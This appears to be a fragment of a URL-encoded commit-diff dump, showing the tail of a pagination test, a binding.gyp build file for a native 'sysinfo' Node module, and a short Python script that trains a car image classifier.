next_offset + 1)),%0A 'links': OrderedDict(%5B%0A ('first', first_url),%0A ('last', last_url),%0A ('next', next_url),%0A ('prev', prev_url),%0A %5D),%0A 'meta': %7B%0A 'pagination': OrderedDict(%5B%0A ('count', count),%0A ('limit', limit),%0A ('offset', offset),%0A %5D)%0A %7D%0A %7D%0A%0A assert queryset == list(range(offset + 1, next_offset + 1))%0A assert content == expected_content%0A
1eed076cc9140d35cd6897ef2bcb5fe0ae943e35
Revert "remove bindings"
binding.gyp
binding.gyp
Python
0
@@ -0,0 +1,336 @@ +%7B%0A%09'targets': %5B%0A%09%09%7B%0A%09%09%09'target_name': 'sysinfo',%0A%09%09%09'conditions': %5B%0A%09%09%09%09%5B'OS==%22solaris%22', %7B%0A%09%09%09%09%09'sources': %5B%0A%09%09%09%09%09%09'src/solaris.cpp'%0A%09%09%09%09%09%5D%0A%09%09%09%09%7D%5D%0A%09%09%09%5D,%0A%09%09%09'sources': %5B%0A%09%09%09%09'src/binding.cpp',%0A%09%09%09%5D,%0A%09%09%09'linkflags': %5B%0A%09%09%09%09'-Lbuild/cd Release/obj.target/sysinfo/src/'%0A%09%09%09%5D,%0A%09%09%09'defines': %5B%0A%09%09%09%09'OS=%22%3C(OS)%22',%0A%09%09%09%09'is_%3C(OS)'%0A%09%09%09%5D,%0A%09%09%7D%0A%09%5D%0A%7D%0A
9a83e01b9710943c50f80c8ffc4e5d5827cb3b92
Check data preparation
main.py
main.py
Python
0.000027
@@ -0,0 +1,320 @@ +from car_classifier import CarClassifier%0A%0Aif __name__ == %22__main__%22:%0A car_img_dir = 'vehicles'%0A not_car_img_dir = 'non-vehicles'%0A sample_size = 8792%0A car_classifier = CarClassifier(car_img_dir=car_img_dir,%0A not_car_img_dir=not_car_img_dir,%0A sample_size = sample_size)%0A%0A car_classifier.fit()%0A